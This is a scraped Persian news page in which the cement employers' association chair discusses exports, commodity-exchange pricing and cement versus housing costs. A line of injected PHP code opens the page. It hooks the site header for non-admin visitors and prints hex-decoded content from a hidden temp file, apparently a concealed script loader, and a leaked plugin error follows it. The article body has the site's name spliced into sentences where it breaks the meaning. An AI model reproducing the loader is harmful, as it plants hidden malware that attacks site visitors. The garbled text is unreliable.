if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } }
Warning: session_start(): Cannot start session when headers already sent in /home3/tabrizj3/public_html/wp-content/plugins/wp-seo-booster-pro/wp-seo-booster-pro.php on line 44
رییس هیات مدیره انجمن صنفی کارفرمایان سیمان: بورس کالا باید نسبت به نگرانی‌ها و ابهام‌های صادر کنندگان سیمان پاسخگو باشد - قوه قضائیه | تبریز جوان - تبریز جوان
کد خبر : 70012
تاریخ انتشار : پنجشنبه ۳ آذر ۱۴۰۱ - ۲۳:۰۸

رییس هیات مدیره انجمن صنفی کارفرمایان سیمان: بورس کالا باید نسبت به نگرانی‌ها و ابهام‌های صادر کنندگان سیمان پاسخگو باشد – قوه قضائیه | تبریز جوان

رییس هیات مدیره انجمن صنفی کارفرمایان سیمان: بورس کالا باید نسبت به نگرانی‌ها و ابهام‌های صادر کنندگان سیمان پاسخگو باشد – قوه قضائیه | تبریز جوان

تبریز جوان – حمید فرمانی روز پنجشنبه در حاشیه نشست کارگروه صادرات سیمان کشور در هرمزگان اظهار داشت: اتفاق‌های بسیاری در این سال‌ها در صنعت سیمان جهان رخ داده و فناوری‌های جدیدی آمده است که بایستی از آن‌ها بهره‌ببریم چراکه فناوری کنونی صنعت سیمان بیشترین مصرف انرژی را داشته و دارای آلایندگی زیست محیطی است.


تبریز جوان – حمید فرمانی روز پنجشنبه در حاشیه نشست کارگروه صادرات سیمان کشور در هرمزگان اظهار داشت: اتفاق‌های بسیاری در این سال‌ها در صنعت سیمان جهان رخ داده و فناوری‌های جدیدی آمده است که بایستی از آن‌ها بهره‌ببریم چراکه فناوری کنونی صنعت سیمان بیشترین مصرف انرژی را داشته و دارای آلایندگی زیست محیطی است.

وی ادامه داد: باید به سمت تولید سیمان‌های آمیخته حرکت کنیم و سیمان‌های جدیدی که ۴۰ درصد تولید گاز دی اکسید کربن، ۱۱ درصد بهای تمام شده و ۲۰ درصد مصرف انرژی را کاهش می‌دهد برویم.

فرمانی تصریح کرد:‌ درست نیست که چون بازار کشش دارد، همیشه خودروی پراید تولید کنیم اما در صنعت سیمان هم همین اتفاق افتاده است، محصولی تولید می‌کنیم و چونکه مشتری دارد می‌خواهیم تا ۱۰۰ سال همان را تولید می‌کنیم.

وی افزود: درحالی که در دنیا اینچنین نیست و با همین ظرفیت شاید ۲ برابر بهره‌وری دارند، البته نه این سیمان بلکه سیمان جدید که آن را به صورت آزمایشگاهی در کرمان تولید کردیم.

رییس هیات مدیره انجمن صنفی کارفرمایان سیمان افزود: اندیشه‌های جدیدی در صنعت سیمان جهان وجود دارد و صرف تولید یک محصول سنتی برای اینکه فروش دارد ما را به پیش نمی‌برد بلکه در همان ۱۰۰ سال گذشته حفظ می‌کند.

فرمانی اشاره کرد: از سال ۱۳۱۸ این نوع سیمان را به همین سبک و روش در کشور تولید می‌کنیم و فقط نگرانیم که یک دلار بالاتر بفروشیم، این نگرانی خوب است اما این نقشه راه آینده نیست.

کشف قیمت سیمان صادراتی در بورس کالا

رییس هیات مدیره انجمن صنفی کارفرمایان سیمان براساس توافق اعضای کارگروه صادرات سیمان این انجمن، با توجه به شفافیت بورس، کشف قیمت سیمان صادراتی در بورس کالا انجام می‌شود چراکه بورس، مکانی برای عرضه و تقاضای شفاف بوده و خریداران و فروشندگان تبریز جوان نیاز و عرضه را در آنجا آورده و طرح می‌کنند.

وی ادامه داد: قمیت هم بر مبنای فرآیندهای شفاف بورس کالا مشخص می‌شود که امکان تبانی بین عرضه کنندگان و خریداران وجود ندارد و این، شفافیت را افزایش می‌دهد.

وی اضافه کرد: بدین‌ترتیب خریداران فرصت منصفانه برای خرید از هر شرکت تولید کننده را خواهند داشت، تصور کنید شرکت سیمان هرمزگان براساس روش سنتی خود ۲ تا سه مشتری داشته است و سایر مشتریان امکان حضور در فرآیند آن را نداشته باشند اما در بورس کالا این امکان برای همه مشتریان فراهم می‌شود که با قیمت مناسب‌تری کالای مورد نیاز خود را خریداری کنند.

رییس هیات مدیره انجمن صنفی کارفرمایان سیمان بیان کرد: این اتفاق هم به نفع شرکت‌های تولیدی و هم به سود منافع ملی ما است که مذاکره‌های لازم با بورس کالا برای این منظور آغاز شده است که قرار است روند آن سرعت گیرد.

فرمانی گفت: این روش در گذشته هم تجربه شد که از شرکت‌ها استقبال نشد و به شکست انجامید اما این بار تلاش داریم به گونه‌ای عمل شود که همه شرکت‌ها برای حضور در بورس کالا اقناع شده و کالا را صرفاً در این بورس عرضه کنند.

وی خاطر نشان کرد: البته صادر کنندگان سیمان نگرانی‌ها و ابهام‌هایی دارند که بورس کالا باید نسبت به رفع آن‌ها پاسخگو باشد یا ساز و کارهایی برای آن‌ها فراهم کند که در این خصوص مذاکره می‌کنیم.

رییس هیات مدیره انجمن صنفی کارفرمایان سیمان یادآور شد: شرایط باید به گونه‌ای باشد که شرکت‌ها نه از سر الزام بلکه با اقناع در بورس کالا، کالای خود را عرضه کنند.

رابطه معناداری بین قیمت سیمان و ساختمان وجود ندارد

فرمانی در خصوص رابطه قیمت سیمان با هزینه ساخت مسکن اظهار داشت: با توجه به حساسیتی که بر روی کالای سیمان وجود دارد و تأثیری که بر ساخت و ساز و مسکن دارد دولت موظف است مراقبت های لازم را در این زمینه داشته باشد اما برخی مواقع این حساسیت‌ها تبدیل به وسواس شده و صرفاً منافع یک طرف دیگر را در نظر می‌گیرد و تولید کنندگان از این حساسیت‌ها متضرر می‌شوند.

وی بیان کرد: اکنون در یک تعامل سازنده با تمامی ذینفعان از جمله بخش دولتی بوده و درحال آگاه‌تر کردن آن‌ها نسبت به واقعیت‌های صنعت سیمان و انتظارات هستیم،‌ همین‌طور با نمایندگان مجلس گفت و گو کرده و گزارش می‌دهیم.

رییس هیات مدیره انجمن صنفی کارفرمایان سیمان ادامه داد: تلاش داریم با ارائه گزارش‌های کارشناسی آن‌ها را با واقعیت‌ها آشنا کنیم و به تدریج مشکل‌ها در حال حل شدن است،‌ وقتی روزهای نخست ورود به بورس کالا را با امروز که صحبت می‌کنیم مقایسه می‌کنیم متوجه ایجاد تفاوت‌های بسیاری می‌شویم.

فرمانی خاطر نشان کرد: با توجه به شناختی که اکنون دولت نسبت به واقعیت‌های این صنعت پیدا کرده و نبود رابطه معنا دار بین قیمت سیمان و مسکن، هر چه زمان می‌گذرد از این حساسیت‌ها در آینده کاسته می‌شود.

وی اظهار داشت: براساس گزارش اخیر بانک مرکزی که در هفته گذشته منتشر شد قیمت سیمان حدود هشت درصد نسبت به هفت ماهه سال گذشته کاهش داشته اما قیمت مسکن افزایش یافته است.

رییس هیات مدیره انجمن صنفی کارفرمایان سیمان ابراز داشت: آمارها نشان می‌دهد هیچ رابطه‌ای بین قیمت سیمان و قیمت مسکن وجود ندارد.

وی تأکید کرد: لذا این نگرش که اگر قیمت سیمان ۱۰ تا ۲۰ درصد افزایش یابد بازار ساختمان بهم می‌ریزد تنها در ذهن برخی‌ها وجود دارد و در عالم واقعیت اینگونه نیست و اگر چنین بود که اکنون که نرخ سیمان کاهش یافته قیمت مسکن هم باید کاهش می‌یافت اما افزایش داشته است.

رییس هیات مدیره انجمن صنفی کارفرمایان سیمان بیان کرد:‌ دولت در بحث حقوق دولتیِ بهره‌برداری از معادن، تبریز جوان حقوق خود را افزایش داده است که این افزایش محدوده‌ای از ۳۰۰ درصد تا یکهزار درصدی بوده است، این واقعیت‌ها را نمی‌توان کتمان کرد و دولت باید اجازه بدهد به همین تناسب قیمت سیمان هم منصفانه تعیین شود.

قیمت سیمان در افزایش قیمت مسکن محلی از اعراب ندارد

فرمانی در پاسخ به این پرسش خبرنگار تبریز جوان که آیا مباحثی که در خصوص تأثیر بالای افزایش قیمت سیمان در افزایش قیمت مسکن در جامعه عنوان می‌شود برای پنهان کردن نقش سودجویی سوداگران است، جواب داد: نمی‌توانم چنین قضاوتی داشته باشم اما شما را به آمار بانک مرکزی ارجاع می‌دهم.

وی افزود: بانک مرکزی اعلام کرده است میانگین قیمت سیمان در هفت‌ماهه امسال نسبت به میانگین ۱۲ ماهه سال گذشته هشت درصد کاهش داشته است پس چرا قیمت مسکن کاهش نیافته و علاوه‌بر آن افزایش هم داشته است.

رییس هیات مدیره انجمن صنفی کارفرمایان سیمان گفت: بنابراین قیمت سیمان در افزایش قیمت مسکن محلی از اعراب ندارد، به طور کلی براساس آمارهای مراجع ذیصلاح مانند وزارت راه و شهرسازی در هر متر مربع ساخت ساختمان چهار کیسه سیمان مصرف می‌شود.

فرمانی ادامه داد: فرض کنید اکنون قرار است در نهضت ملی مسکن هر مترمربع ساختمان را با قیمت تمام شده هشت میلیون تومان بسازند، اکنون قیمت هر کیسه سیمان در جلوی کارخانه ۳۵ تا ۴۰ هزار تومان است، نهایت قیمت چهار کسیه سیمان ۴۰ هزار تومانی ۱۶۰ هزار تومان می‌شود حالا می‌گوییم ۲۰۰ هزار تومان شده است، حال محاسبه کنید این مبلغ در مبلغ هر متر مربع هشت میلیون تومان چند درصد از بهای تمام شده را تشکیل می‌دهد!

وی تصریح کرد: اگر کسی پول داشته و خواست خانه بسازد توصیه می‌کنیم پول خود را برای خرید و دپوی سیمان هزینه نکند چون با افزایش قیمت سیمان اتفاقی در حوزه مسکن رخ نمی‌دهد.

۷۲ میلیون تن سیمان در کشور تولید شد

وی اشاره کرد: ۷۵ شرکت فعال تولید سیمان اعم از سفید و خاکستری با ظرفیت تولید کشور ۸۸ میلیون تن بدون استثنا عضو انجمن صنفی کارفرمایان تولید کننده صنعت سیمان کشور بوده و ایران ششمین کشور تولید کننده بزرگ سیمان جهان است، تبریز جوان مصرف داخلی کشور هم حدود ۶۲ میلیون تن است.

رییس هیات مدیره انجمن صنفی کارفرمایان سیمان بیان کرد: حدود ۱۰ تا ۱۲ میلیون تُن به صورت سالانه صادرات می‌کنیم و حدود ۱۶ تا ۱۷ میلیون تن هم مازاد ظرفیت موجود است که به تولید می‌رسد و بازارهای داخلی و خارجی کشش جذب آن را ندارند.

فرمانی تأکید کرد: امیدواریم با به راه افتادن نهضت ملی مسکن و ساخت سالی یک میلیون مسکن به شرط تحویل انرژی پایدار شاهد تولید ۸۸ میلیون تن سیمان باشیم.

وی ادامه داد: ۷۲ میلیون تن سیمان در سال گذشته تولید شد و تبریز جوان تولید امسال هم به همین تبریز جوان خواهد شد مگر اینکه انرژی صنعت تأمین و نهضت ملی مسکن راه بیفتد.

رییس هیات مدیره انجمن صنغی کارفرمایان سیمان تأکید کرد: این نهضت باید از حالت شعار خارج شده و مصرف ایجاد کند که این اتفاق، تقاضا ایجاد کرده و موجب می‌شود به تولید مطلوب در کشور برسیم.

۱۲ میلیون تن سیمان و کلینکر صادر شد

فرمانی اشاره کرد: صادرات انواع سیمان و کلینکر در سال گذشته ۱۲ میلیون تُن بود و در هفت‌ماهه امسال هم هشت میلیون و ۲۰۰ هزار تُن به ۲۰ مقصد صادرات انجام شده است.

وی گفت: براساس بررسی‌های انجام شده در سال گذشته برخی از مقاصد صادراتی شامل آفریقا، کشورهای منطقه خلیج فارس و دریای عمان و کشورهای آسیایی بوده است.

رییس هیات مدیره انجمن صنفی کارفرمایان سیمان اشاره کرد: این شناخت و فهم وجود دارد که ایجاد ارزش افزوده با حضور در کشورهای مقصد و حوزه‌های هدف صادراتی محقق می‌شود اما به خاطر شرایط تحریم ها امکان این حضور فراهم نیست.

وی تصریح کرد: اکنون نمی‌توانیم در کشوری مانند بنگلادش یا کشورهای حوزه خلیج فارس دفتری داشته باشیم تا بتوانیم ارزش افزوده بیشتری نصیب شرکت‌های تولید کننده کنیم، لذا حداکثری چیزی که می‌فروشیم فروش به صورت فوب است.

« در اصطلاح فوب ، چنانچه خریدار محلی را در بندر مبدا تعیین نکرده باشد فروشنده می تواند محموله را در هر نقطه از بندر یاد شده تخلیه کند. در اینصورت مسئولیت فروشنده در قبال تحویل کالا خاتمه خواهد یافت»

برچسب ها :

ناموجود
ارسال نظر شما
مجموع نظرات : 20 در انتظار بررسی : 20 انتشار یافته : 0
  • نظرات ارسال شده توسط شما، پس از تایید توسط مدیران سایت منتشر خواهد شد.
  • نظراتی که حاوی تهمت یا افترا باشد منتشر نخواهد شد.
  • نظراتی که به غیر از زبان فارسی یا غیر مرتبط با خبر باشد منتشر نخواهد شد.